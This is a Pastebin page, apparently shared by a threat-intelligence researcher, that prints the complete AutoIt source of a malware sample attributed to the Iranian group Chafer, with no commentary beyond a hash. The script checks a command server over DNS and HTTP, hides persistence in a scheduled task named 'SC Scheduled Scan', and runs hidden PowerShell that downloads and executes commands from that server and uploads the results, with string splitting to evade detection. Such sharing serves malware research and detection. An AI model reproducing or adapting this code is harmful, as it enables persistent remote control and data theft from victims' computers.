API tools faq
paste
Advertisement
vk_intel

3-22-2018: Iranian threat group #Chafer autoit

vk_intel
Mar 22nd, 2018
1,288
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.95 KB | None | 0 0
raw download clone embed print report
  1. #hash 332fab21cb0f2f50774fccf94fc7ae905a21b37fe66010dcef6b71c140bb7fa1
  2.  
  3. #include <GUIConstantsEx.au3>
  4. #include <WindowsConstants.au3>
  5. #include <SendMessage.au3>
  6. #include <Misc.au3>
  7. #include <MsgBoxConstants.au3>
  8. #include <Date.au3>
  9. #include <File.au3>
  10.  
  11.  
  12. #AutoIt3Wrapper_icon=VBSim.ico
  13. #NoTrayIcon
  14. $oMyError = ObjEvent("AutoIt.Error","MyErrFunc") ; Initialize a COM error handler
  15. ; This is my custom defined error handler
  16.  
  17. Global $userver = "j-alam.com"
  18.  
  19. Func MyErrFunc()
  20. ;Msgbox(0,"AutoItCOM Test","We intercepted a COM Error !" & @CRLF & @CRLF & _
  21. ; "err.description is: " & @TAB & $oMyError.description & @CRLF & _
  22. ; "err.windescription:" & @TAB & $oMyError.windescription & @CRLF & _
  23. ; "err.number is: " & @TAB & hex($oMyError.number,8) & @CRLF & _
  24. ; "err.lastdllerror is: " & @TAB & $oMyError.lastdllerror & @CRLF & _
  25. ; "err.scriptline is: " & @TAB & $oMyError.scriptline & @CRLF & _
  26. ; "err.source is: " & @TAB & $oMyError.source & @CRLF & _
  27. ; "err.helpfile is: " & @TAB & $oMyError.helpfile & @CRLF & _
  28. ; "err.helpcontext is: " & @TAB & $oMyError.helpcontext _
  29. ; )
  30. EndFunc
  31.  
  32. $dll = DllOpen("user32.dll")
  33. TCPStartup()
  34. Func On_Exit()
  35. TCPShutdown()
  36. Exit
  37. EndFunc
  38. OnAutoItExitRegister("On_Exit")
  39.  
  40. Func randomStr($len)
  41. $pwd = ""
  42. Local $aSpace[3]
  43. For $i = 1 To $len
  44. $aSpace[0] = Chr(Random(65, 90, 1)) ;A-Z
  45. $aSpace[1] = Chr(Random(97, 122, 1)) ;a-z
  46. $aSpace[2] = Chr(Random(48, 57, 1)) ;0-9
  47. $pwd &= $aSpace[Random(0, 2, 1)]
  48. Next
  49. return $pwd
  50. EndFunc
  51.  
  52. Func CheckDNSIP($hostname)
  53. For $i = 5 To 1 Step -1
  54. Local $sIPAddress = TCPNameToIP("aa1"&randomStr(2)&"."&$hostname)
  55. _FileWriteLog(@ScriptDir & "\Ex.log", $sIPAddress)
  56. If @error Then
  57. ContinueLoop
  58. EndIf
  59. if StringLeft($sIPAddress, 3) = "65." Then
  60. Return True
  61. Else
  62. ContinueLoop
  63. EndIf
  64. Next
  65. Return False
  66. EndFunc ;==>Example
  67. Func CheckDNSTXT($hostname)
  68. For $i = 5 To 1 Step -1
  69. $foo = Run("nslookup.exe -q=TXT " & "g_" &randomStr(2) & "_" & randomStr(2) & "." & $hostname, "", @SW_HIDE, $STDERR_CHILD + $STDOUT_CHILD)
  70. Local $line = ""
  71. While 1
  72. $line &= StdoutRead($foo)
  73. If @error Then ExitLoop
  74. Wend
  75. _FileWriteLog(@ScriptDir & "\Ex.log", "DNSTXT:" & $line)
  76. Local $aArray = StringRegExp($line, '(\".*?\")', $STR_REGEXPARRAYMATCH )
  77.  
  78. if UBound($aArray) == 0 Then
  79. ContinueLoop
  80. EndIf
  81. Return True
  82. Next
  83. Return False
  84. EndFunc
  85. Func HttpGet($sURL)
  86. Local $oHTTP = ObjCreate("WinHttp.WinHttpRequest.5.1")
  87.  
  88. $oHTTP.Open("GET", $sURL , False)
  89. If (@error) Then Return SetError(1, 0, 0)
  90.  
  91. $oHTTP.Send()
  92. If (@error) Then Return SetError(2, 0, 0)
  93.  
  94. If ($oHTTP.Status <> 200) Then Return SetError(3, 0, 0)
  95.  
  96. Return SetError(0, 0, $oHTTP.ResponseText)
  97. EndFunc
  98. Func CheckHttp($surl)
  99. Local $oHTTP = ObjCreate("WinHttp.WinHttpRequest.5.1")
  100. $oHTTP.Open("GET", $sURL, False)
  101. If (@error) Then Return False
  102. $oHTTP.Send()
  103. If (@error) Then Return False
  104. If ($oHTTP.Status <> 200) Then Return False
  105. Return True
  106. EndFunc
  107.  
  108. Func MethodFinder()
  109. Local $method = 0
  110.  
  111. if (CheckDNSIP($userver)) Then
  112. $method = 0
  113. EndIf
  114.  
  115. if (CheckDNSTXT($userver)) Then
  116. $method = 1
  117. EndIf
  118.  
  119. if (CheckHttp("http://"& $userver&"/update.php")) Then
  120. $method = 2
  121. EndIf
  122.  
  123. Return $method
  124. EndFunc
  125.  
  126. ;Local $te = MethodFinder()
  127.  
  128. ;_FileWriteLog(@ScriptDir & "\Ex.log", "MethodFinder:" & $te)
  129.  
  130.  
  131. RunWait("ipconfig /flushdns", '', @SW_HIDE)
  132. Local $HOME = @UserProfileDir & "\appdata\local\microsoft\Taskbar\"
  133. Local $cname = @ComputerName
  134. $cname = StringLeft($cname, 5)
  135. ;========================= create essential directory======================
  136. if Not FileExists($HOME) Then
  137. DirCreate($Home)
  138. EndIf
  139. if Not FileExists($HOME&"dn") Then
  140. DirCreate($Home&"dn")
  141. EndIf
  142. if Not FileExists($HOME&"up") Then
  143. DirCreate($Home&"up")
  144. EndIf
  145. ;============================= read method from reg if not exist create registry value =============
  146. Local $epocTime = ((@YEAR - 1970) * 31557600) + (int ((@YEAR - 1972) / 4) * 86400) + ((@YDAY - 1) * 86400) + (@HOUR * 3600) + (@MIN * 60) + @SEC
  147. Local $method = RegRead("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UMe")
  148. if @error Then
  149. RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UMe", "REG_SZ", "0")
  150. RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UT", "REG_SZ", "0")
  151. $method = 0;
  152. EndIf
  153. Local $lastMethodFinderTime = RegRead("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UT")
  154. if (@error or $epocTime - $lastMethodFinderTime > 400) Then
  155. $method = MethodFinder()
  156. _FileWriteLog(@ScriptDir & "\Ex.log", "newMethod:" & $method)
  157. RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UMe", "REG_SZ", $method)
  158. RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UT", "REG_SZ", $epocTime)
  159. EndIf
  160. ;=============================== create task schedule ===================================
  161. $txtStr = "schta"&"sks /create /F"&" /sc minute /mo 3 /tn ""SC Scheduled Scan"" /tr ""%userprofile%\appdata\local\microsoft\Taskbar\autoit3.exe '" & @ScriptFullPath & "'"""
  162. RunWait($txtStr, '', @SW_HIDE)
  163. _FileWriteLog(@ScriptDir & "\Ex.log", "Method:" & $method)
  164. ;============================ run powershell in assosation with $method ===============
  165. Switch $method
  166. Case 0
  167. Local $exitcode = RunWait("powershell.exe -nop -executionpolicy bypass -File """ & $HOME & "dnip.ps1""" , '', @SW_HIDE)
  168. _FileWriteLog(@ScriptDir & "\Ex.log", "Powershell start 0:" & $method & "\t ExitCode:" & $exitcode)
  169. _FileWriteLog(@ScriptDir & "\Ex.log", "Home:" & $HOME)
  170. Case 1
  171. Local $exitcode = RunWait("powershell.exe -nop -executionpolicy bypass -File """ & $HOME & "dntx.ps1""" , '', @SW_HIDE)
  172. _FileWriteLog(@ScriptDir & "\Ex.log", "Powershell start 1:" & $method & "\t ExitCode:" & $exitcode)
  173. _FileWriteLog(@ScriptDir & "\Ex.log", "Home:" & $HOME)
  174. Case 2
  175. ;Local $SERVER="http://107.191.62.45:7023/update.php?req=" & $cname
  176. Local $SERVER="ht"&"tp:"&"/"&"/"& $userver&"/upd" & "ate."& "ph"&"p?req"& "=" & $cname
  177. $Dwn= "powershell "" " & _
  178. " &{$wc=(new-object System.Net.WebClient); " & _
  179. "while(1){try{$r=Get-Random ;$wc.DownloadFile('" _
  180. & $SERVER & _
  181. "&m=d','" & $HOME & "dn\'+$r+'.-_');" & _
  182. " Rename-Item -path ('" & _
  183. $HOME & _
  184. "dn\'+$r+'.-_') -newname " & _
  185. "($wc.ResponseHeaders['Content-Disposition'].Substring(" & _
  186. "$wc.ResponseHeaders['Content-Disposition'].Indexof('filename=')+9))}catch{break}}}"""
  187.  
  188. $Dwn = StringReplace($Dwn, "-_", "dwn")
  189.  
  190. RunWait($Dwn, '', @SW_HIDE)
  191.  
  192.  
  193. $DownloadExecute="powershell "" " & _
  194. "&{$r=Get-Random; "& _
  195. "$wc=(new-object System.Net.WebClient);" & _
  196. "$wc.DownloadFile('" & $SERVER & "&m=b','" & $HOME&"dn\'+$r+'.-_');" & _
  197. "Invoke-Expression ('"& StringReplace($HOME, " ", "` ")&"dn\'+$r+'.-_ >" & StringReplace($HOME, " ", "` ")&"up\'+$r+'-_');" & _
  198. "Rename-Item -path ('" & $HOME & _
  199. "up\'+$r+'-_') -newname ($wc.ResponseHeaders['Content-Disposition'].Substring(" & _
  200. "$wc.ResponseHeaders['Content-Disposition'].Indexof('filename=')+9)+'.txt');" & _
  201. "Get-ChildItem " & StringReplace($HOME, " ", "` ") & "up\ | ForEach-Object "& _
  202. "{if((Get-Item($_.FullName)).length -gt 0){$wc.UploadFile('" & _
  203. $SERVER & _
  204. "&m=u',$_.FullName)};" & _
  205. "Remove-Item $_.FullName};Remove-Item ('"& $HOME & "dn\'+$r+'.-_')}"""
  206.  
  207. $DownloadExecute = StringReplace($DownloadExecute, "-_", "bat")
  208.  
  209. RunWait($DownloadExecute, '', @SW_HIDE)
  210. EndSwitch
  211.  
  212. Exit
  213.  
  214.  
  215. $hGUI = GUICreate("X", 0, 0, -1, -1, BitOR($WS_POPUP, $WS_BORDER), $WS_EX_TOPMOST)
  216. GUISetBkColor(0xFFFFFF, $hGUI)
  217. GUISetState()
  218.  
  219.  
  220. HotKeySet("{ESC}", "On_Exit")
  221.  
  222.  
  223. HotKeySet("{ESC}", "Terminate")
  224. Func Terminate()
  225. DllClose($dll)
  226. Exit 0
  227. EndFunc
  228.  
  229. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!